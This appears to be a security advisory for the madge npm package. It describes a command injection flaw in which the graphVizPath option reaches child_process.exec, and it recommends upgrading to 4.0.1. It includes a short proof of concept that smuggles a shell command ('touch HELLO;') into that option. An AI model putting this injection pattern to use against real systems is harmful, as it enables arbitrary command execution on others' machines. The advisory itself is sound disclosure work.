madge - Create graphs from module dependencies.

    How to fix?

    Command Injection

    madge is a Madge is a developer tool for generating a visual graph of your module dependencies, finding circular dependencies, and give you other useful info.

    Affected versions of this package are vulnerable to Command Injection. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function.


    1. install `madge` module: `npm i madge`
    2. run the following poc.js:
    // Example taken from:
    const madge = require('madge');
    madge('..', {graphVizPath: "touch HELLO;"})
    .then((res) => res.svg())
    .then((writtenImagePath) => {
    console.log('Image written to ' + writtenImagePath);

    How to fix Command Injection?

    Upgrade madge to version 4.0.1 or higher.
